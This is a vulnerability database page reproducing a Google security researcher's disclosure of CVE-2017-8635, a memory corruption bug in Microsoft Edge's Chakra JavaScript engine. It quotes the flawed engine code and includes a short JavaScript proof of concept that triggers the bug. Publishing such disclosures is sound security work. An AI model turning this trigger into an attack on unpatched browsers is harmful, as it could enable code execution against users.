Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Edge Chakra TryUndeleteProperty Incorrect Usage

🗓️ 16 Aug 2017 00:00:00Reported by Google Security ResearchType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

Microsoft Edge Chakra TryUndeleteProperty Incorrect Usage CVE-2017-863

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Edge Chakra TryUndeleteProperty Incorrect Usage Exploit
17 Aug 201700:00
zdt
BDU FSTEC		The vulnerability in the JavaScript engine of Microsoft Edge and Internet Explorer allows a hacker to execute arbitrary code.
25 Aug 201700:00
bdu_fstec
Circl		CVE-2017-8635
17 Aug 201700:00
circl
CNVD		Microsoft Windows Internet Explorer and Edge JavaScript Engine Remote Code Execution Vulnerability (CNVD-2017-20505)
9 Aug 201700:00
cnvd
Check Point Advisories		Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-8635)
28 Aug 201700:00
checkpoint_advisories
CVE		CVE-2017-8635
8 Aug 201721:00
cve
Cvelist		CVE-2017-8635
8 Aug 201721:00
cvelist
Microsoft KB		August 8, 2017—KB4034658 (OS Build 14393.1593)
8 Aug 201707:00
mskb
Microsoft KB		August 8, 2017—KB4034660 (OS Build 10586.1045)
8 Aug 201707:00
mskb
Microsoft KB		August 8, 2017—KB4034664 (Monthly Rollup)
8 Aug 201707:00
mskb
Rows per page
` Microsoft Edge: Chakra: Incorrect usage of TryUndeleteProperty   
  
CVE-2017-8635  
  
  
Chakra implemented the reuse of deleted properties of an unordered dictionary object with the following code.  
  
bool SimpleDictionaryUnorderedTypeHandler::TryReuseDeletedPropertyIndex(  
DynamicObject *const object,  
TPropertyIndex *const propertyIndex)  
{  
if(deletedPropertyIndex == PropertyIndexRanges<TPropertyIndex>::NoSlots)  
{  
return false;  
}  
  
*propertyIndex = deletedPropertyIndex;  
deletedPropertyIndex = static_cast<TPropertyIndex>(TaggedInt::ToInt32(object->GetSlot(deletedPropertyIndex)));  
return true;  
}  
  
bool SimpleDictionaryUnorderedTypeHandle::TryUndeleteProperty(  
DynamicObject *const object,  
const TPropertyIndex existingPropertyIndex,  
TPropertyIndex *const propertyIndex)  
{  
...  
  
if(!IsReusablePropertyIndex(existingPropertyIndex))  
{  
return false;  
}  
  
...  
  
const bool reused = TryReuseDeletedPropertyIndex(object, propertyIndex);  
Assert(reused);  
  
...  
return true;  
}  
  
  
BOOL SimpleDictionaryTypeHandlerBase<TPropertyIndex, TMapKey, IsNotExtensibleSupported>::SetPropertyFromDescriptor(DynamicObject* instance, PropertyId propertyId, TPropertyKey propertyKey, SimpleDictionaryPropertyDescriptor<TPropertyIndex>* descriptor, Var value, PropertyOperationFlags flags, PropertyValueInfo* info)  
{  
...  
if (descriptor->Attributes & PropertyDeleted)  
{  
...  
if(isUnordered)  
{  
TPropertyIndex propertyIndex;  
if(AsUnordered()->TryUndeleteProperty(instance, descriptor->propertyIndex, &propertyIndex))  
{  
Assert(PropertyRecordStringHashComparer<TMapKey>::Equals(propertyMap->GetKeyAt(propertyIndex), propertyRecord));  
descriptor = propertyMap->GetReferenceAt(propertyIndex);  
}  
}  
  
if (IsNotExtensibleSupported)  
{  
bool isForce = (flags & PropertyOperation_Force) != 0;  
if (!isForce)  
{  
if (!this->VerifyIsExtensible(scriptContext, throwIfNotExtensible))  
{  
return FALSE; <<------ (a)  
}  
}  
}  
...  
descriptor->Attributes = PropertyDynamicTypeDefaults;  
...  
}  
...  
}  
  
"TryUndeleteProperty" is calling "TryReuseDeletedPropertyIndex" on the assumption that the return value of it is always true. But if the method exits at (a), "descriptor->Attributes" will remain with "PropertyDeleted" set, and therefore we can call "TryUndeleteProperty" again and again until "deletedPropertyIndex" becames "NoSlots" which makes "TryReuseDeletedPropertyIndex" return false.  
  
In the debug build, the PoC hits the assertion "Assert(reused);". In the release build, "propertyIndex" remains uninitialized, this will cause a memory corruption.  
  
PoC:  
const kNumProperties = 100;  
  
let o = {};  
for (let i = 0; i < kNumProperties; ++i)  
o['a' + i] = i;  
  
Object.preventExtensions(o); // IsNotExtensibleSupported && !this->VerifyIsExtensible  
  
for (let i = 0; i < kNumProperties; ++i)  
delete o['a' + i];  
  
for (let i = 0; i < 0x1000; ++i)  
o['a0'] = 1; // calling TryUndeleteProperty again again  
  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Aug 2017 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.57966
microsoft edgechakratryundeletepropertyincorrect usagecve-2017-8635memory corruptionassertion failuredebug buildrelease buildpocuninitialized propertyindexextensiblememory corruptionsecurity vulnerability
28